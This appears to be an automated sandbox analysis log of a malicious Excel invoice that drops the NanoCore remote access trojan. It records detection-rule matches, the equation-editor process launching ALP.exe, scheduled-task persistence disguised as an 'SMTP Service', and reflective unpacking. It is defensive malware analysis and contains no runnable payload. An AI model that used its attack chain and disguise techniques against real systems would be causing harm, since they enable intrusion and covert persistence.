        Source: 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: ALP.exe PID: 1212, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: smtpsvc.exe PID: 344, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_004330D0
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_0043009C
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_00431121
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_00431B00
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_00433CD8
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_00434E09
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_00431700
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_004380FA
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_0043A901
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_00438108
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_0043A910
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_004399D0
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_0043838A
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_00438398
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_004313B0
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_004304E1
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_00438569
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_00436D18
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_00436D28
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_00435DF0
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_0043AE48
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_0043AE38
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_00437F08
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_00437F18
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_0025E038
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_0025C0B0
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_002543A0
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_0025B498
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_00253788
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_0025C16E
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_00254458
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_00727050
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_0072D540
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_0072EA30
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_00727C68
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_0072E158
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_0072E216
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_00727D26
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_022E0048
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_022E0C50
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_022E4CB8
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_022E43C8
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_022E4078
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_022E1527
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_022E0D1E
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_0031009C
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_003130D0
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00311121
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00311B00
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00313CD8
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00314E09
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00311700
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_0031A910
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_0031A901
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00318108
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00319A0D
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00316260
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_003113B0
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00318398
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00313C30
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00316D28
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00316D18
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00318569
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00315DF0
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00315DEC
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_0031A630
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_0031AE38
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_0031AE48
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00317F18
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 10_2_00317F08
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E009C
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E30D0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E1121
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E1B00
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E3CD8
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E4E09
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E1700
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E8108
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002EA901
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002EA910
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E99D0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E13B0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E8398
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E6D28
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E6D18
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E8569
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E5DF0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002EAE38
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002EAE48
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E7F08
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 11_2_002E7F18
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_0025009C
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_002530D0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_00251121
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_00251B00
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_00253CD8
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_00254E09
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_00251700
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_0025A901
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_00258108
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_0025A910
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_002599D0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_002513B0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_00258398
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_002504E1
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_00256D28
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_00256D18
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_00258569
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_00255DF0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_0025AE38
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_0025AE48
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_00257F08
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_00257F18
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 14_2_003F43A0
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 14_2_003F3788
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 14_2_003F4458
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 16_2_002143A0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 16_2_00213788
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 16_2_00214C78
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 16_2_00214458
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 17_2_003146C9
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 17_2_003143A0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 17_2_00313788
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 17_2_00314C78
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 17_2_00314458
        Source: C:\Users\user\AppData\Roaming\ALP.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\ALP.exeMemory allocated: 76E90000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\ALP.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\ALP.exeMemory allocated: 76E90000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\ALP.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\ALP.exeMemory allocated: 76E90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E90000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\ALP.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\ALP.exeMemory allocated: 76E90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E90000 page execute and read and write
        Source: ALP.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: smtpsvc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: INVOICE = 212888585 .xlsxVirustotal: Detection: 42%
        Source: INVOICE = 212888585 .xlsxReversingLabs: Detection: 50%
        Source: C:\Users\user\AppData\Roaming\ALP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................0.......................(.P.............P...............g.................................................................(.....
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ........................................(.P.............................f.......................................................................
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3811.tmp'
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp277F.tmp'
        Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {6D7D75E4-8EFD-44BB-96AC-FEA7E6E0852F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe 0
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
        Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3811.tmp'
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp277F.tmp'
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe 0
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$INVOICE = 212888585 .xlsxJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR904.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@26/9@18/2
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Roaming\ALP.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\ALP.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\ALP.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\ALP.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\ALP.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{9ed8d108-2eb1-4e23-9679-783796e4baff}
        Source: C:\Users\user\AppData\Roaming\ALP.exeFile created: C:\Program Files (x86)\SMTP ServiceJump to behavior
        Source: ALP.exe.2.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 3.2.ALP.exe.910000.1.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 3.0.ALP.exe.910000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: smtpsvc.exe.4.dr, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 4.2.ALP.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 4.2.ALP.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 4.2.ALP.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Roaming\ALP.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: INVOICE = 212888585 .xlsxInitial sample: OLE zip file path = xl/calcChain.xml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: ALP.exe, 00000004.00000002.690979593.0000000000820000.00000004.00020000.sdmp
        Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp
        Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: ALP.exe, 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp
        Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: ALP.exe, 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp
        Source: INVOICE = 212888585 .xlsxInitial sample: OLE indicators vbamacros = False

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: ALP.exe.2.dr, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 3.2.ALP.exe.910000.1.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 3.0.ALP.exe.910000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: smtpsvc.exe.4.dr, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 4.2.ALP.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 4.2.ALP.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 4.0.ALP.exe.910000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 4.2.ALP.exe.910000.14.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 10.2.ALP.exe.910000.1.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 10.0.ALP.exe.910000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 11.0.smtpsvc.exe.be0000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_0043C0D0 push ds; ret
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 3_2_00434B50 push eax; retn 004Eh
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_004732B7 push cs; ret
